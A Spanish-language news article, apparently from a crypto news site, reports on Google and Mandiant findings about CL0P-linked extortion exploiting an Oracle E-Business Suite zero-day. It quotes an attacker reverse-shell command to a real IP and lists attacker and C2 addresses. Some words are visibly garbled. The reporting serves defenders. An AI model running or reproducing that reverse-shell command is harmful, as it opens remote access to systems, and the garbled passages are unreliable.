Google revela explotación de "enormes cantidades de datos de clientes" en campaña de extorsión masiva

El gigante tecnológico descubre brecha de seguridad monumental mientras Wall Street sigue preocupándose por márgenes de beneficio del 2%.

VULNERABILIDAD EXPUESTA

Google detecta filtración masiva que compromete información sensible de usuarios a escala global. Los atacantes aprovecharon fallos sistémicos para extraer volúmenes extraordinarios de datos personales.

EXTORSIÓN DIGITAL

Los ciberdelincuentes implementaron campaña de chantaje sofisticada utilizando la información robada como moneda de cambio. Las tácticas incluyen amenazas de exposición pública y demandas de rescate en criptomonedas.

RESPUESTA INMEDIATA

Equipos de seguridad activan protocolos de emergencia para contener el daño. Notifican a autoridades reguladoras y usuarios afectados mientras refuerzan medidas defensivas.

Las empresas tradicionales siguen contando centavos mientras el mundo digital enfrenta amenazas de millones - la ironía duele más que cualquier hackeo.

Google y Mandiant revelan una explotación de día cero 

Según el informe de Google, los atacantes enviaron un “gran volumen” de correos electrónicos a ejecutivos de múltiples organizaciones, alegando violaciones de sus entornos Oracle EBS y amenazando con publicar datos robados a menos que se pagara un rescate .

Los correos electrónicos, enviados desde cientos de cuentas de terceros comprometidas, incluían direcciones de contacto, [email protected] y [email protected] , previamente vinculadas al sitio de filtración de datos CL0P.

La investigación conjunta de Google y Mandiant reveló que la actividad de explotación se remonta a julio de 2025, posiblemente vinculada a una vulnerabilidad de día cero, ahora traccomo CVE-2025-61882. En algunos casos, los atacantes supuestamente extrajeron una cantidad significativa de datos de las organizaciones afectadas.

Oracle declaró que las fallas explotadas se habían corregido en julio, pero el 4 de octubre publicó actualizaciones de emergencia para abordar vulnerabilidades adicionales. Oracle recomendó a sus clientes que utilizaran las últimas actualizaciones de parches críticos y enfatizó que mantenerse al día con todos los parches es esencial para evitar vulnerabilidades.

La marca de extorsión CL0P ha estado activa desde 2020 y está históricamente vinculada al grupo de ciberdelincuencia FIN11. Anteriormente, ha atacado sistemas de transferencia de archivos gestionados como MOVEit, GoAnywhere y Accellion FTA. Estas campañas siguieron un patrón similar: explotación masiva de vulnerabilidades de día cero, robo de datos confidenciales y extorsión semanas después. 

En el momento del informe , no habían aparecido nuevas víctimas de este incidente dent el sitio de filtración de datos de CL0P.

Implantes de Java complejos y de múltiples etapas

Google y Mandiant revela que los atacantes utilizaron múltiples cadenas de explotación dirigidas a componentes de Oracle EBS, incluidos UiServlet y SyncServlet, para lograr la ejecución remota de código y colocar implantes Java en múltiples etapas.

En julio de 2025, se detectó actividad sospechosa relacionada con solicitudes HTTP a /OA_HTML/configurator/UiServlet. Esta actividad sospechosa se observó en otro exploit que posteriormente apareció en un grupo de Telegram llamado "SCATTERED LAPSUS$ HUNTERS". 

El exploit filtrado hizo uso de varias técnicas avanzadas para obtener control sobre los servidores seleccionados, como una falsificación de solicitud del lado del servidor (SSRF), una omisión de autenticación y una inyección de plantilla XSL.

Para agosto de 2025, los atacantes comenzaron a usar otra herramienta llamada SyncServlet para crear y ejecutar plantillas dañinas dentro de la base de datos EBS. Estas plantillas contenían cargas útiles XSL codificadas en Base64 que cargaban malware basado en Java directamente en la memoria. 

Entre los implantesdentestaban GOLDVEIN.JAVA, un descargador que recuperaba cargas útiles de segunda etapa de servidores de comando controlados por el atacante, y una cadena de múltiples capas denominada SAGE, que instalaba filtros de servlets Java persistentes para una mayor explotación.

Tras vulnerar el sistema, los atacantes usaron la cuenta EBS "applmgr" para explorarlo, recopilar información de red y del sistema, e instalar más archivos maliciosos. También usaron comandos de shell como ip addr, netstat -an y bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

Las direcciones IP 200.107.207.26 y 161.97.99.49 fuerondenten intentos de explotación, mientras que 162.55.17.215:443 y 104.194.11.200:443 fueron listadas como servidores de comando y control para la carga útil GOLDVEIN.JAVA.

GTIG no ha vinculado formalmente la operación a ningún grupo conocido, pero la campaña comparte similitudes con FIN11, un grupo de ciberdelincuencia con motivaciones financieras que anteriormente estaba asociado con el ransomware CL0P y operaciones de robo de datos a gran escala. 

Mandiant también señaló que una de las cuentas comprometidas utilizadas para enviar correos electrónicos de extorsión se había utilizado en ataques anteriores relacionados con FIN11.

Se insta a los usuarios a desconfiar de las tablas de bases de datos EBS XDO_TEMPLATES_B y XDO_LOBS, especialmente de aquellas cuyos nombres comienzan con “TMP” o “DEF”, y a bloquear el tráfico externo de Internet desde los servidores EBS para evitar una mayor extorsión de datos.

Las organizaciones también recomiendan monitorear de cerca las solicitudes HTTP a puntos finales como /OA_HTML/SyncServlet y /OA_HTML/configurator/UiServlet, y analizar los volcados de memoria para buscar evidencia de cargas útiles de Java en memoria.

Google advirtió que los grupos vinculados a CL0P casi con certeza continuarán dedicando sus recursos a adquirir exploits de día cero.

Hazte notar donde importa. Publicita en Cryptopolitan Research y llega a los inversores y creadores de criptomonedas más inteligentes.